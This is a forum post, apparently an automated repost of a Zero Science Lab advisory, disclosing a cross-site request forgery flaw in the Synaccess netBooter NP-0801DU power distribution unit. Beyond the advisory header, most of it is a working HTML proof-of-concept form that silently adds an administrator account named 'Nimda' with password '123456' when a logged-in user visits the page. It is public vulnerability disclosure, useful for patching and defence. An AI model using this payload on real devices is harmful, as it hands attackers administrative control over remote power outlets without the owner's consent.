1. Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
    Сокриј

Synaccess netBooter NP-0801DU 7.4 CSRF Add Admin Exploit

Дискусија во форумот 'Ранливости // Експлоити // Закрпи' започната од zeroscience, 17 ноември 2018.

  1. zeroscience

    zeroscience
    ZSL Bot v4.89.1.00

    574
    507
    31 Мај 2010
    Код:
    <!--
    
    Synaccess netBooter NP-0801DU 7.4 CSRF Add Admin Exploit
    
    
    Vendor: Synaccess Networks Inc.
    Product web page: https://www.synaccess-net.com
    Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
    
    Summary: netBooter NP-0801DU and NP-0801DUH PDUs provide secured
    remote power source management of 8 independent outlets. Includes
    true RMS AC current reading and environment temperature monitoring
    via TCP/IP networks or local direct connection.
    
    Desc: The application interface allows users to perform certain
    actions via HTTP requests without performing any validity checks
    to verify the requests. This can be exploited to perform certai
     actions with administrative privileges if a logged-in user visits
    a malicious web site.
    
    Tested on: Synaccess server
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2018-5501
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php
    
    
    05.11.2018
    
    -->
    
    <html>
      <body>
       <form action="http://10.0.0.19:8082/adm.htm" method="POST">
         <input type="hidden" name="add1" value="Nimda" />
         <input type="hidden" name="add2" value="123456" />
         <input type="hidden" name="add3" value="123456" />
         <input type="hidden" name="adm0" value="1" />
         <input type="submit" value="Gou" />
       </form>
      </body>
    </html>
    

    Zero Science Lab » Synaccess netBooter NP-0801DU 7.4 CSRF Add Admin Exploit
     

Сподели

Вчитување...